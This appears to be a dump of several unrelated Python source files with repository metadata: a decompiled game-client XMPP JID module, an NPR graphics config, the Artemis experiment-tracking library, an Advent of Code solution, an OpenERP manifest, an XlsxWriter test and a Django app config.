elif isinstance(jid, BareJID):
self._node, self._domain, tail = jid.getNode(), jid.getDomain(), jid.getResource()
else:
raise ValueError('JID can be specified as string or as instance of JID class.')
return tail
def getBareJID(self):
return self
def getNode(self):
return self._node
def setNode(self, node):
if node is None:
self._node = ''
if type(node) in types.StringTypes:
self._node = node.lower()
else:
self._node = node
return
def getDomain(self):
return self._domain
def setDomain(self, domain):
        assert domain, 'Domain must not be empty'
self._domain = domain.lower()
def getResource(self):
return ''
def setResource(self, resource):
pass
def __str__(self):
if self._node:
jid = '{0}@{1}'.format(self._node, self._domain)
else:
jid = self._domain
return jid
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__str__() == str(other)
def __ne__(self, other):
return not self.__eq__(other)
def __nonzero__(self):
return self.__str__() != ''
def __hash__(self):
return hash(self.__str__())
def __getstate__(self):
return str(self)
def __setstate__(self, state):
self.setJID(state)
class JID(BareJID):
__slots__ = ('_resource',)
def __init__(self, jid = None):
super(JID, self).__init__(jid)
def setJID(self, jid):
self._resource = super(JID, self).setJID(jid)
def getBareJID(self):
return BareJID(self)
def getResource(self):
return self._resource
def setResource(self, resource):
self._resource = resource or ''
def __str__(self):
jid = super(JID, self).__str__()
if self._resource:
jid = '{0}/{1}'.format(jid, self._resource)
return jid
class _DatabaseIDGetter(object):
def getDatabaseID(self):
value = getattr(self, '_node')
if value:
try:
result = long(value)
except ValueError:
result = 0
else:
result = 0
return result
class ContactBareJID(BareJID, _DatabaseIDGetter):
def __hash__(self):
return self.getDatabaseID()
class ContactJID(JID, _DatabaseIDGetter):
def getBareJID(self):
return ContactBareJID(self)
def __hash__(self):
return self.getDatabaseID()
def makeContactJID(dbID):
jid = ContactBareJID()
jid.setNode(long(dbID))
jid.setDomain(g_settings.server.XMPP.domain)
return jid
_counter = SequenceIDGenerator()
def makeUserRoomJID(room = ''):
jid = JID()
service = g_settings.server.XMPP.getChannelByType(XMPP_MUC_CHANNEL_TYPE.USERS)
if not service or not service['hostname']:
return jid
if not room:
room = 'user_room_{:08X}_{:08X}_{:04X}'.format(long(time.time()) & 4294967295L, random.randrange(1, 4294967295L), _counter.next())
jid.setNode(room)
jid.setDomain(service['hostname'])
return jid
def makeSystemRoomJID(room = '', channelType = XMPP_MUC_CHANNEL_TYPE.STANDARD):
"""
    Create a JID for a system room.
    :param room: room name, if one already exists
:param channelType: channel type (XMPP_MUC_CHANNEL_TYPE)
:return: system room jid
"""
jid = JID()
service = g_settings.server.XMPP.getChannelByType(channelType)
if not service or not service['hostname']:
return jid
room = room or _getSystemChannelNameFormatter(service)
if not room:
return jid
jid.setNode(room)
jid.setDomain(service['hostname'])
return jid
def _getSystemChannelNameFormatter(service):
peripheryID = connectionManager.peripheryID
chanTemplate = Template(service['format'])
if chanTemplate:
return chanTemplate.safe_substitute(peripheryID=peripheryID, userString=service['userString'], hostname=service['hostname'], type=service['type'])
else:
return None
def makeClanRoomJID(clandDbId, channelType = XMPP_MUC_CHANNEL_TYPE.CLANS):
"""
    Create a JID for a clan room.
    :param clandDbId: clan database id
:return: clan room jid
"""
jid = JID()
service = g_settings.server.XMPP.getChannelByType(channelType)
if not service or not service['hostname']:
return jid
clanTemplate = Template(service['format'])
room = clanTemplate.safe_substitute(clanDBID=clandDbId)
if not room:
return jid
jid.setNode(room)
jid.setDomain(service['hostname'])
return jid
# okay decompyling c:\Users\PC\wotsources\files\originals\res\packages\scripts\scripts\client\messenger\proto\xmpp\jid.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.02.03 21:53:47 Střední Evropa (běžný čas)
| [
"[email protected]"
] | |
d7a833d3cfc9b1389683b76c5f0ef9a016938987 | 78f3fe4a148c86ce9b80411a3433a49ccfdc02dd | /2017/09/wisc-gerrymandering-20170929/graphic_config.py | cb18764b6b447f7d4bc8090dc4075e9d99f838a3 | [] | no_license | nprapps/graphics-archive | 54cfc4d4d670aca4d71839d70f23a8bf645c692f | fe92cd061730496cb95c9df8fa624505c3b291f8 | refs/heads/master | 2023-03-04T11:35:36.413216 | 2023-02-26T23:26:48 | 2023-02-26T23:26:48 | 22,472,848 | 16 | 7 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | #!/usr/bin/env python
import base_filters
COPY_GOOGLE_DOC_KEY = '1F_HDqo1D2EwXiUx95wG4QPRAvhm3P76OP6aXyv8NYgY'
USE_ASSETS = True
# Use these variables to override the default cache timeouts for this graphic
# DEFAULT_MAX_AGE = 20
# ASSETS_MAX_AGE = 300
JINJA_FILTER_FUNCTIONS = base_filters.FILTERS
| [
"[email protected]"
] | |
48afa2ed7bfc32040267b178f1deefe509eece2c | 776125e755de00eecd90b9813022ae8491a75711 | /artemis/experiments/experiments.py | bf0aa78fb62b8b59d5e1bcba51955aa1c79562b7 | [
"BSD-2-Clause-Views"
] | permissive | nalyat/artemis | 04c6d4b77e143f8f439dd4aefb519d9a1c5011e0 | ad2871fae7d986bf10580eec27aee5b7315adad5 | refs/heads/master | 2022-04-10T04:45:28.753251 | 2019-04-17T03:18:57 | 2019-04-17T03:18:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28,710 | py | import atexit
import inspect
from collections import OrderedDict
from contextlib import contextmanager
from functools import partial
from six import string_types
from artemis.experiments.experiment_record import ExpStatusOptions, experiment_id_to_record_ids, load_experiment_record, \
get_all_record_ids, clear_experiment_records
from artemis.experiments.experiment_record import run_and_record
from artemis.experiments.experiment_record_view import compare_experiment_records, show_record
from artemis.experiments.hyperparameter_search import parameter_search
from artemis.general.display import sensible_str
from artemis.general.functional import get_partial_root, partial_reparametrization, \
advanced_getargspec, PartialReparametrization
from artemis.general.should_be_builtins import izip_equal
from artemis.general.test_mode import is_test_mode
class Experiment(object):
"""
An experiment. In general you should not use this class directly. Use the experiment_function decorator, and
create variants using decorated_function.add_variant()
"""
def __init__(self, function=None, show=None, compare=None, one_liner_function=None, result_parser = None,
name=None, is_root=False):
"""
:param function: The function defining the experiment
        :param show: A function that can be called to display the results returned by function.
This can be useful if you just want to re-run the display for already-computed and saved results.
To do this, go experiment.save_last()
:param conclusion: <Deprecated> will be removed in future
        :param name: Name of this experiment.
"""
self.name = name
self.function = function
self._show = show_record if show is None else show
self._one_liner_results = sensible_str if one_liner_function is None else one_liner_function
self._result_parser = (lambda result: [('Result', self.one_liner_function(result))]) if result_parser is None else result_parser
self._compare = compare_experiment_records if compare is None else compare
self.variants = OrderedDict()
self._notes = []
self.is_root = is_root
self._tags= set()
if not is_root:
all_args, varargs_name, kargs_name, defaults = advanced_getargspec(function)
undefined_args = [a for a in all_args if a not in defaults]
assert len(undefined_args)==0, "{} is not a root-experiment, but arguments {} are undefined. Either provide a value for these arguments or define this as a root_experiment (see {})."\
.format(self, undefined_args, 'X.add_root_variant(...)' if isinstance(function, partial) else 'X.add_config_root_variant(...)' if isinstance(function, PartialReparametrization) else '@experiment_root')
_register_experiment(self)
@property
def show(self):
return self._show
@property
def one_liner_function(self):
return self._one_liner_results
@property
def compare(self):
return self._compare
@compare.setter
def compare(self, val):
self._compare = val
@property
def result_parser(self):
return self._result_parser
def __call__(self, *args, **kwargs):
""" Run the function as normal, without recording or anything. You can also modify with arguments. """
return self.function(*args, **kwargs)
def __str__(self):
return 'Experiment {}'.format(self.name)
def get_args(self):
"""
:return OrderedDict[str, Any]: An OrderedDict of arguments to the experiment
"""
all_arg_names, _, _, defaults = advanced_getargspec(self.function)
return OrderedDict((name, defaults[name]) for name in all_arg_names)
def get_root_function(self):
return get_partial_root(self.function)
def is_generator(self):
return inspect.isgeneratorfunction(self.get_root_function())
def call(self, *args, **kwargs):
"""
Call the experiment function without running as an experiment. If the experiment is a function, this is the same
as just result = my_exp_func(). If it's defined as a generator, it loops and returns the last result.
:return: The last result
"""
if self.is_generator():
result = None
for x in self(*args, **kwargs):
result = x
else:
result = self(*args, **kwargs)
return result
def run(self, print_to_console=True, show_figs=None, test_mode=None, keep_record=None, raise_exceptions=True,
display_results=False, notes = (), **experiment_record_kwargs):
"""
Run the experiment, and return the ExperimentRecord that is generated.
:param print_to_console: Print to console (as well as logging to file)
:param show_figs: Show figures (as well as saving to file)
:param test_mode: Run in "test_mode". This sets the global "test_mode" flag when running the experiment. This
flag can be used to, for example, shorten a training session to verify that the code runs. Can be:
True: Run in test mode
False: Don't run in test mode:
None: Keep the current state of the global "is_test_mode()" flag.
:param keep_record: Keep the folder that results are saved into.
True: Results are saved into a folder
False: Results folder is deleted at the end.
None: If "test_mode" is true, then delete results at end, otherwise save them.
:param raise_exceptions: True to raise any exception that occurs when running the experiment. False to catch it,
print the error, and move on.
:param experiment_record_kwargs: Passed to the "record_experiment" context.
:return: The ExperimentRecord object, if keep_record is true, otherwise None
"""
for exp_rec in self.iterator(print_to_console=print_to_console, show_figs=show_figs, test_mode=test_mode, keep_record=keep_record,
raise_exceptions=raise_exceptions, display_results=display_results, notes=notes, **experiment_record_kwargs):
pass
return exp_rec
def iterator(self, print_to_console=True, show_figs=None, test_mode=None, keep_record=None, raise_exceptions=True,
display_results=False, notes = (), **experiment_record_kwargs):
if keep_record is None:
keep_record = keep_record_by_default if keep_record_by_default is not None else not test_mode
exp_rec = None
for exp_rec in run_and_record(
function = self.function,
experiment_id=self.name,
print_to_console=print_to_console,
show_figs=show_figs,
test_mode=test_mode,
keep_record=keep_record,
raise_exceptions=raise_exceptions,
notes=notes,
**experiment_record_kwargs
):
yield exp_rec
        assert exp_rec is not None, 'Should never happen.'
if display_results:
self.show(exp_rec)
return
def _create_experiment_variant(self, args, kwargs, is_root):
# TODO: For non-root variants, assert that all args are defined
        assert len(args) in (0, 1), "When creating an experiment variant, you can either provide one unnamed argument (the experiment name), or zero, in which case the experiment is named after the named arguments. See add_variant docstring"
name = args[0] if len(args) == 1 else _kwargs_to_experiment_name(kwargs)
assert isinstance(name, str), 'Name should be a string. Not: {}'.format(name)
assert name not in self.variants, 'Variant "%s" already exists.' % (name,)
assert '/' not in name, 'Experiment names cannot have "/" in them: {}'.format(name)
ex = Experiment(
name=self.name + '.' + name,
function=partial(self.function, **kwargs),
show=self._show,
compare=self._compare,
one_liner_function=self.one_liner_function,
result_parser=self._result_parser,
is_root=is_root
)
self.variants[name] = ex
return ex
def add_variant(self, variant_name = None, **kwargs):
"""
Add a variant to this experiment, and register it on the list of experiments.
There are two ways you can do this:
.. code-block:: python
            # Name the experiment explicitly, then list the named arguments
my_experiment_function.add_variant('big_a', a=10000)
assert my_experiment_function.get_name()=='my_experiment_function.big_a'
# Allow the experiment to be named automatically, and just list the named arguments
my_experiment_function.add_variant(a=10000)
assert my_experiment_function.get_name()=='my_experiment_function.a=10000'
:param variant_name: Optionally, the name of the experiment
:param kwargs: The named arguments which will differ from the base experiment.
:return Experiment: The experiment.
"""
return self._create_experiment_variant(() if variant_name is None else (variant_name, ), kwargs, is_root=False)
def add_root_variant(self, variant_name=None, **kwargs):
"""
Add a variant to this experiment, but do NOT register it on the list of experiments.
There are two ways you can do this:
.. code-block:: python
            # Name the experiment explicitly, then list the named arguments
my_experiment_function.add_root_variant('big_a', a=10000)
assert my_experiment_function.get_name()=='my_experiment_function.big_a'
# Allow the experiment to be named automatically, and just list the named arguments
my_experiment_function.add_root_variant(a=10000)
assert my_experiment_function.get_name()=='my_experiment_function.a=10000'
:param variant_name: Optionally, the name of the experiment
:param kwargs: The named arguments which will differ from the base experiment.
:return Experiment: The experiment.
"""
return self._create_experiment_variant(() if variant_name is None else (variant_name, ), kwargs, is_root=True)
def copy_variants(self, other_experiment):
"""
Copy over the variants from another experiment.
:param other_experiment: An Experiment Object
"""
base_args = other_experiment.get_args()
for variant in other_experiment.get_variants():
if variant is not self:
variant_args = variant.get_args()
different_args = {k: v for k, v in variant_args.items() if base_args[k]!=v}
name_diff = variant.get_id()[len(other_experiment.get_id())+1:]
v = self.add_variant(name_diff, **different_args)
v.copy_variants(variant)
def _add_config(self, name, arg_constructors, is_root):
assert isinstance(name, str), 'Name should be a string. Not: {}'.format(name)
assert name not in self.variants, 'Variant "%s" already exists.' % (name,)
assert '/' not in name, 'Experiment names cannot have "/" in them: {}'.format(name)
configured_function = partial_reparametrization(self.function, **arg_constructors)
ex = Experiment(
name=self.name + '.' + name,
function=configured_function,
show=self._show,
compare=self._compare,
one_liner_function=self.one_liner_function,
is_root=is_root
)
self.variants[name] = ex
return ex
def add_config_variant(self, name, **arg_constructors):
"""
Add a variant where you redefine the constructor for arguments to the experiment. e.g.
@experiment_function
def demo_smooth_out_signal(smoother, signal):
y = [smoother.update(xt) for xt in signal]
plt.plot(y)
return y
            demo_smooth_out_signal.add_config_variant('exp_smooth', smoother = lambda decay=0.1: ExponentialMovingAverage(decay))
This creates a variant "exp_smooth" which can be parameterized by a "decay" argument.
:param name: Name of the variant
        :param arg_constructors: The constructors for the arguments which you'd like to configure.
:return: A new experiment.
"""
return self._add_config(name, arg_constructors=arg_constructors, is_root=False)
def add_config_root_variant(self, name, **arg_constructors):
"""
Add a config variant which requires additional parametrization. (See add_config_variant)
"""
return self._add_config(name, arg_constructors=arg_constructors, is_root=True)
def get_id(self):
"""
:return: A string uniquely identifying this experiment.
"""
return self.name
def get_variant(self, variant_name=None, **kwargs):
"""
Get a variant on this experiment.
:param str variant_name: The name of the variant, if it has one
:param kwargs: Otherwise, the named arguments which were used to define the variant.
:return Experiment: An Experiment object
"""
if variant_name is None:
variant_name = _kwargs_to_experiment_name(kwargs)
else:
assert len(kwargs)==0, 'If you provide a variant name ({}), there is no need to specify the keyword arguments. ({})'.format(variant_name, kwargs)
assert variant_name in self.variants, "No variant '{}' exists. Existing variants: {}".format(variant_name, list(self.variants.keys()))
return self.variants[variant_name]
def get_records(self, only_completed=False):
"""
Get all records associated with this experiment.
:param only_completed: Only include records that have run to completion.
:return: A list of ExperimentRecord objects.
"""
records = [load_experiment_record(rid) for rid in experiment_id_to_record_ids(self.name)]
if only_completed:
records = [record for record in records if record.get_status()==ExpStatusOptions.FINISHED]
return records
def browse(self, command=None, catch_errors = False, close_after = False, filterexp=None, filterrec = None,
view_mode ='full', raise_display_errors=False, run_args=None, keep_record=True, truncate_result_to=100,
cache_result_string = False, remove_prefix = None, display_format='nested', **kwargs):
"""
Open up the UI, which allows you to run experiments and view their results.
:param command: Optionally, a string command to pass directly to the UI. (e.g. "run 1")
:param catch_errors: Catch errors that arise while running experiments
:param close_after: Close after issuing one command.
:param filterexp: Filter the experiments with this selection (see help for how to use)
:param filterrec: Filter the experiment records with this selection (see help for how to use)
:param view_mode: How to view experiments {'full', 'results'} ('results' leads to a narrower display).
:param raise_display_errors: Raise errors that arise when displaying the table (otherwise just indicate that display failed in table)
:param run_args: A dict of named arguments to pass on to Experiment.run
:param keep_record: Keep a record of the experiment after running.
:param truncate_result_to: An integer, indicating the maximum length of the result string to display.
:param cache_result_string: Cache the result string (useful when it takes a very long time to display the results
when opening up the menu - often when results are long lists).
:param remove_prefix: Remove the common prefix on the experiment ids in the display.
        :param display_format: How experiments and their records are displayed: 'nested' or 'flat'. 'nested' might be
better for narrow console outputs.
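        Example (a sketch): my_exp.browse(command='run 1', close_after=True)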
"""
from artemis.experiments.ui import ExperimentBrowser
experiments = get_ordered_descendents_of_root(root_experiment=self)
browser = ExperimentBrowser(experiments=experiments, catch_errors=catch_errors, close_after=close_after,
filterexp=filterexp, filterrec=filterrec, view_mode=view_mode, raise_display_errors=raise_display_errors,
run_args=run_args, keep_record=keep_record, truncate_result_to=truncate_result_to, cache_result_string=cache_result_string,
remove_prefix=remove_prefix, display_format=display_format, **kwargs)
browser.launch(command=command)
# Above this line is the core api....
# -----------------------------------
# Below this line are a bunch of convenience functions.
def has_record(self, completed=True, valid=True):
"""
Return true if the experiment has a record, otherwise false.
:param completed: Check that the record is completed.
:param valid: Check that the record is valid (arguments match current experiment arguments)
:return: True/False
"""
records = self.get_records(only_completed=completed)
if valid:
records = [record for record in records if record.args_valid()]
return len(records)>0
def get_variants(self):
return self.variants.values()
def get_all_variants(self, include_roots=False, include_self=True):
"""
Return a list of variants of this experiment
:param include_roots: Include "root" experiments
:param include_self: Include this experiment (unless include_roots is false and this this experiment is a root)
:return: A list of experiments.
"""
variants = []
if include_self and (not self.is_root or include_roots):
variants.append(self)
for name, v in self.variants.items():
variants += v.get_all_variants(include_roots=include_roots, include_self=True)
return variants
def test(self, **kwargs):
self.run(test_mode=True, **kwargs)
def get_latest_record(self, only_completed=False, if_none = 'skip'):
"""
Return the ExperimentRecord from the latest run of this Experiment.
:param only_completed: Only search among records of that have run to completion.
:param if_none: What to do if no record exists. Options are:
'skip': Return None
'err': Raise an exception
'run': Run the experiment to get the record
:return ExperimentRecord: An ExperimentRecord object
"""
assert if_none in ('skip', 'err', 'run')
records = self.get_records(only_completed=only_completed)
if len(records)==0:
if if_none=='run':
return self.run()
elif if_none=='err':
raise Exception('No{} records for experiment "{}"'.format(' completed' if only_completed else '', self.name))
else:
return None
else:
return sorted(records, key=lambda x: x.get_id())[-1]
def get_variant_records(self, only_completed=False, only_last=False, flat=False):
"""
Get the collection of records associated with all variants of this Experiment.
:param only_completed: Only search among records of that have run to completion.
:param only_last: Just return the most recent record.
:param flat: Just return a list of records
:return: if not flat (default) An OrderedDict<experiment_id: ExperimentRecord>.
otherwise, if flat: a list<ExperimentRecord>
"""
variants = self.get_all_variants(include_self=True)
if only_last:
exp_record_dict = OrderedDict((ex.name, ex.get_latest_record(only_completed=only_completed, if_none='skip')) for ex in variants)
if flat:
return [record for record in exp_record_dict.values() if record is not None]
else:
return exp_record_dict
else:
exp_record_dict = OrderedDict((ex.name, ex.get_records(only_completed=only_completed)) for ex in variants)
if flat:
return [record for records in exp_record_dict.values() for record in records]
else:
return exp_record_dict
def add_parameter_search(self, name='parameter_search', fixed_args = {}, space = None, n_calls=None, search_params = None, scalar_func=None):
"""
:param name: Name of the Experiment to be created
:param dict[str, Any] fixed_args: Any fixed-arguments to provide to all experiments.
:param dict[str, skopt.space.Dimension] space: A dict mapping param name to Dimension.
e.g. space=dict(a = Real(1, 100, 'log-uniform'), b = Real(1, 100, 'log-uniform'))
:param Callable[[Any], float] scalar_func: Takes the return value of the experiment and turns it into a scalar
which we aim to minimize.
:param dict[str, Any] search_params: Args passed to parameter_search
:return Experiment: A new experiment which runs the search and yields current-best parameters with every iteration.
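        Example (a sketch, assuming scikit-optimize is installed and my_exp is an Experiment):
            from skopt.space import Real
            search_exp = my_exp.add_parameter_search(space=dict(a=Real(1, 100, 'log-uniform')))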
"""
assert space is not None, "You must specify a parameter search space. See this method's documentation"
if name is None: # TODO: Set name=None in the default after deadline
name = 'parameter_search[{}]'.format(','.join(space.keys()))
if search_params is None:
search_params = {}
def objective(**current_params):
output = self.call(**current_params)
if scalar_func is not None:
output = scalar_func(output)
return output
from artemis.experiments import ExperimentFunction
def search_func(fixed):
n_calls_to_make = n_calls if n_calls is not None else 3 if is_test_mode() else 100
this_objective = partial(objective, **fixed)
for iter_info in parameter_search(this_objective, n_calls=n_calls_to_make, space=space, **search_params):
info = dict(names=list(space.keys()), x_iters =iter_info.x_iters, func_vals=iter_info.func_vals, score = iter_info.func_vals, x=iter_info.x, fun=iter_info.fun)
latest_info = {name: val for name, val in izip_equal(info['names'], iter_info.x_iters[-1])}
print('Latest: {}, Score: {:.3g}'.format(latest_info, iter_info.func_vals[-1]))
yield info
# The following is a hack to dynamically create a function with the given args
# arg_string = ', '.join('{}={}'.format(k, v) for k, v in fixed_args.items())
# param_search = None
# exec('global param_search\ndef func({fixed}): search_func(fixed_args=dict({fixed})); param_search=func'.format(fixed=arg_string))
# param_search = locals()['param_search']
search_exp_func = partial(search_func, fixed=fixed_args) # We do this so that the fixed parameters will be recorded and we will see if they changed.
search_exp = ExperimentFunction(name = self.name + '.'+ name, show = show_parameter_search_record, one_liner_function=parameter_search_one_liner)(search_exp_func)
self.variants[name] = search_exp
search_exp.tag('psearch') # Secret feature that makes it easy to select all parameter experiments in ui with "filter tag:psearch"
return search_exp
def tag(self, tag):
"""
Add a "tag" - a string identifying the experiment as being in some sort of group.
You can use tags in the UI with 'filter tag:my_tag' to select experiments with a given tag
:param tag:
:return:
"""
self._tags.add(tag)
return self
def get_tags(self):
return self._tags
def show_parameter_search_record(record):
from tabulate import tabulate
result = record.get_result()
table = tabulate([list(xs)+[fun] for xs, fun in zip(result['x_iters'], result['func_vals'])], headers=list(result['names'])+['score'])
print(table)
def parameter_search_one_liner(result):
return '{} Runs : '.format(len(result["x_iters"])) + ', '.join('{}={:.3g}'.format(k, v) for k, v in izip_equal(result['names'], result['x'])) + ' : Score = {:.3g}'.format(result["fun"])
_GLOBAL_EXPERIMENT_LIBRARY = OrderedDict()
class ExperimentNotFoundError(Exception):
def __init__(self, experiment_id):
Exception.__init__(self,'Experiment "{}" could not be loaded, either because it has not been imported, or its definition was removed.'.format(experiment_id))
def clear_all_experiments():
_GLOBAL_EXPERIMENT_LIBRARY.clear()
@contextmanager
def capture_created_experiments():
"""
A convenient way to cross-breed experiments. If you define experiments in this block, you can capture them for
later use (for instance by modifying them). e.g.:
.. code-block:: python
@experiment_function
def add_two_numbers(a=1, b=2):
return a+b
with capture_created_experiments() as exps:
add_two_numbers.add_variant(a=3)
for ex in exps:
ex.add_variant(b=4)
:rtype: Generator[:class:`Experiment`]
"""
current_len = len(_GLOBAL_EXPERIMENT_LIBRARY)
new_experiments = []
yield new_experiments
for ex in list(_GLOBAL_EXPERIMENT_LIBRARY.values())[current_len:]:
new_experiments.append(ex)
def _register_experiment(experiment):
assert experiment.name not in _GLOBAL_EXPERIMENT_LIBRARY, 'You have already registered an experiment named {} in {}'.format(experiment.name, inspect.getmodule(experiment.get_root_function()).__name__)
_GLOBAL_EXPERIMENT_LIBRARY[experiment.name] = experiment
def get_nonroot_global_experiment_library():
return OrderedDict((name, exp) for name, exp in _GLOBAL_EXPERIMENT_LIBRARY.items() if not exp.is_root)
def get_ordered_descendents_of_root(root_experiment):
"""
:param Experiment root_experiment: An experiment which has variants
:return List[Experiment]: A list of the descendents (i.e. variants and subvariants) of the root experiment, in the
order in which they were created
"""
descendents_of_root = set(ex for ex in root_experiment.get_all_variants(include_self=True))
return [ex for ex in get_nonroot_global_experiment_library().values() if ex in descendents_of_root]
def get_experiment_info(name):
experiment = load_experiment(name)
return str(experiment)
def load_experiment(experiment_id):
try:
return _GLOBAL_EXPERIMENT_LIBRARY[experiment_id]
except KeyError:
raise ExperimentNotFoundError(experiment_id)
def is_experiment_loadable(experiment_id):
assert isinstance(experiment_id, string_types), 'Expected a string for experiment_id, not {}'.format(experiment_id)
return experiment_id in _GLOBAL_EXPERIMENT_LIBRARY
def _kwargs_to_experiment_name(kwargs):
string = ','.join('{}={}'.format(argname, kwargs[argname]) for argname in sorted(kwargs.keys()))
string = string.replace('/', '_SLASH_')
return string
@contextmanager
def hold_global_experiment_libary(new_lib = None):
if new_lib is None:
new_lib = OrderedDict()
global _GLOBAL_EXPERIMENT_LIBRARY
oldlib = _GLOBAL_EXPERIMENT_LIBRARY
_GLOBAL_EXPERIMENT_LIBRARY = new_lib
yield _GLOBAL_EXPERIMENT_LIBRARY
_GLOBAL_EXPERIMENT_LIBRARY = oldlib
def get_global_experiment_library():
return _GLOBAL_EXPERIMENT_LIBRARY
keep_record_by_default = None
@contextmanager
def experiment_testing_context(close_figures_at_end = True, new_experiment_lib = False):
"""
Use this context when testing the experiment/experiment_record infrastructure.
Should only really be used in test_experiment_record.py
"""
ids = get_all_record_ids()
global keep_record_by_default
old_val = keep_record_by_default
keep_record_by_default = True
if new_experiment_lib:
with hold_global_experiment_libary():
yield
else:
yield
keep_record_by_default = old_val
if close_figures_at_end:
from matplotlib import pyplot as plt
plt.close('all')
def clean_on_close():
new_ids = set(get_all_record_ids()).difference(ids)
clear_experiment_records(list(new_ids))
atexit.register(clean_on_close) # We register this on exit to avoid race conditions with system commands when we open figures externally
| [
"[email protected]"
] | |
76dbaf4b89ba0644af07d6d0fb1df5416f4fe855 | 16631cf7cd4a70f2cd2750851649d3eff5e17724 | /2015/day19/part1.py | 20687aa134135898c045654106d8f4e7b87ac77d | [] | no_license | kynax/AdventOfCode | 1dd609a3308d733f2dd7d4ea00508d2da73180b9 | 36a339241dd7a31ebe08a73e5efa599e5faeea1a | refs/heads/master | 2022-12-21T13:32:52.591068 | 2022-12-16T22:41:30 | 2022-12-16T22:41:30 | 48,439,585 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 891 | py | import sys
mol = 'CRnSiRnCaPTiMgYCaPTiRnFArSiThFArCaSiThSiThPBCaCaSiRnSiRnTiTiMgArPBCaPMgYPTiRnFArFArCaSiRnBPMgArPRnCaPTiRnFArCaSiThCaCaFArPBCaCaPTiTiRnFArCaSiRnSiAlYSiThRnFArArCaSiRnBFArCaCaSiRnSiThCaCaCaFYCaPTiBCaSiThCaSiThPMgArSiRnCaPBFYCaCaFArCaCaCaCaSiThCaSiRnPRnFArPBSiThPRnFArSiRnMgArCaFYFArCaSiRnSiAlArTiTiTiTiTiTiTiRnPMgArPTiTiTiBSiRnSiAlArTiTiRnPMgArCaFYBPBPTiRnSiRnMgArSiThCaFArCaSiThFArPRnFArCaSiRnTiBSiThSiRnSiAlYCaFArPRnFArSiThCaFArCaCaSiThCaCaCaSiRnPRnCaFArFYPMgArCaPBCaPBSiRnFYPBCaFArCaSiAl'
#mol = 'ZZSiZZZZSiZSiZZSi'
#mol = 'HOHOHO'
res = []
repl = []
for line in sys.stdin:
words = line.split()
repl.append((words[0],words[2]))
c = 0
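# For each rule key -> val, generate every molecule reachable by one single
# replacement: substitute one occurrence at a time, then slide past that match
# so each position is tried exactly once; set() deduplicates at the end.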
for (key,val) in repl:
cur = mol
pre = ''
while(key in cur):
i = cur.index(key)
out = pre + cur.replace(key,val,1)
pre += cur[:i+1]
cur = cur[i+1:]
res.append(out)
# if i == len(cur)-1:
# break
print(len(set(res))) | [
"[email protected]"
] | |
1c35de4f84d46d2c3defc2f8ec85426949e56c02 | 97e60d0ca572d0dc3fc80f8719cd57a707ab6069 | /bias_account_report_v6/__openerp__.py | 6349817b455c8fc304e48597e462c7badb0b10a8 | [] | no_license | josepato/bias_trunk_v6 | 0c7c86493c88f015c049a139360478cabec7f698 | b6ab6fc2ff3dc832f26effdba421bcc76d5cabac | refs/heads/master | 2020-06-12T14:18:31.101513 | 2016-12-15T22:55:54 | 2016-12-15T22:55:54 | 75,803,957 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,724 | py | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Bias Account Custom Report',
'version': '1.0',
'category': 'Generic Modules/Account',
'description': """ Add custom report capabilities """,
'author': 'BIAS',
'depends': ['account', 'bias_fiscal_statements_v6'],
'update_xml': [
'security/ir.model.access.csv',
'custom_report_view.xml',
'custom_report_wizard.xml',
'financial_reports_wizard.xml',
'financial_reports_report.xml',
'custom_report_report.xml',
],
'installable': True,
'active': False,
# 'certificate': '0048234520147',
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"[email protected]"
] | |
15f8cd0d04070fe3d412a6539a5235a6a8ef6c98 | da19363deecd93a73246aaea877ee6607daa6897 | /xlsxwriter/test/worksheet/test_write_filter.py | bfe6d60fc98f85a51ac98245e67242f2736abce1 | [] | no_license | UNPSJB/FarmaciaCrisol | 119d2d22417c503d906409a47b9d5abfca1fc119 | b2b1223c067a8f8f19019237cbf0e36a27a118a6 | refs/heads/master | 2021-01-15T22:29:11.943996 | 2016-02-05T14:30:28 | 2016-02-05T14:30:28 | 22,967,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, [email protected]
#
import unittest
from ...compatibility import StringIO
from ...worksheet import Worksheet
class TestWriteFilter(unittest.TestCase):
"""
Test the Worksheet _write_filter() method.
"""
def setUp(self):
self.fh = StringIO()
self.worksheet = Worksheet()
self.worksheet._set_filehandle(self.fh)
def test_write_filter(self):
"""Test the _write_filter() method"""
self.worksheet._write_filter('East')
exp = """<filter val="East"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
| [
"[email protected]"
] | |
9db96c6dbb62656d25dbde9c5f8ba667c8585fa8 | 3817a595bdf246996c1f3846860cea9a9154f1cc | /AltviaDogs/apps.py | 6e7c68cfaf6935515b6abbaa873e7c0dd3d098b0 | [] | no_license | shedwyn/AltviaDogs | 99e83f217d891c5060d0b9a8f0997ea4ea2c5dc2 | 150078897d38c84ac3c492635ea777476e84b0d9 | refs/heads/master | 2021-01-24T00:32:32.176410 | 2018-08-24T20:01:47 | 2018-08-24T20:01:47 | 122,768,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 319 | py | """
Designed and built by Erin 'Ernie' L. Fough.
June 2018 (start)
contact: [email protected]
want to know when this was last updated? See README.md.
"""
from django.apps import AppConfig
class AltviaDogsConfig(AppConfig):
"""Establish Link to Dog Manager (AltviaDogs) Application."""
name = 'AltviaDogs'
| [
"[email protected]"
] | |
